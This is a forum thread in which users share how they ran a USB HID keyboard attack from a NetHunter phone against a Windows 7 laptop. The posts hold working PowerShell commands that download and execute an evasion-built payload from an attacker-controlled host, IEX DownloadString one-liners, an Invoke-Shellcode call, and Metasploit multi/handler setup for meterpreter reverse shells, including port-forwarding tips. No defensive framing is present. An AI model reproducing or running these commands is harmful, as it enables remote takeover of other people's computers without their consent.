Results 1 to 5 of 5

Thread: Hid Keyboard, Payload.

  1. #1
    Member
    Join Date
    Mar 2013
    Posts
    95

    Hid Keyboard, Payload.

    I recently for one reason or another(probably user error) had trouble getting a windows 7 laptop to accept a payload,
    having tried various ways and coming up empty handed i ended up creating the payload with veil-evasion and hosting it
    in my nexus #/data/local/kali-armhf/var/www folder.

    I then used the windows CMD section of HID Keyboard Attack and entered the following, 192.168.0.2 was the ip of my
    nexus.

    *CD c:/
    Powershell
    $Url='http://192.168.0.2/payload.bat'
    $Path='C:payload.bat'
    $Username=''
    $Password=''

    $WebClient=New-Object System.Net.WebClient
    $WebClient.Credentials=New-Object System.Net.Networkcredential($Username, $Password)
    $WebClient.DownloadFile( $url, $path )

    exit
    payload.bat

    Then i set up the Listener on my kali laptop, to wait for a call. I selected windows 7 ticked Admin, plugged
    in and Pressed Execute. The windows 7 laptop proceeded to download the payload from my nexus and run it.
    Kali then recieved a call back straight away. I'm sure this is by far not the best way to do this and could
    probably be done a lot easier another way, but for me it suited the situation. And just wanted to share.


    Many thanks.

  2. #2
    Member
    Join Date
    Mar 2014
    Posts
    79
    Would you mind expanding a bit on how to set up the listener?

  3. #3
    Member
    Join Date
    Mar 2013
    Posts
    95
    Sure, i apologise for my terrible writing, i have no excuse

    Well first i opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next i used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

    Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers

  4. #4
    Junior Member
    Join Date
    Sep 2014
    Posts
    11
    you should post pictures up for everyone to track

  5. #5
    Junior Member
    Join Date
    Oct 2015
    Posts
    2
    Quote Originally Posted by skycrazy View Post
    Sure, i apologise for my terrible writing, i have no excuse

    Well first i opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next i used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

    Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers

    I'm having a lot of troubles trying to get HID Keyboard Attack to work, your information was really help full.

    What i usually do, is send the powershell to download the file from my nethunter device (The usual payload) and the system connect fine using the Windows CMD attack. I can't get it to work from the Powersploit.

    c:\>powershell
    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    For some reason that i can't understand the payload from nethunter is not downloaded from the /var/www/ directory. I found that this file needs to be in the /usr/share/mana-toolkit/www/portal/ directory. If the file is not there the system won't download the file because it can find it.

    When I'm using this

    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    some times the meterpreter have problems backgrounding the session, so I end up using


    IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.1.105 –Lport 4444 –Force

    By the way i'm suppose to be using the Nethunter 2.0.1 on lollipop, but the Net Hunter Home reports Version 1.0.

    Please excuse my poor English.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •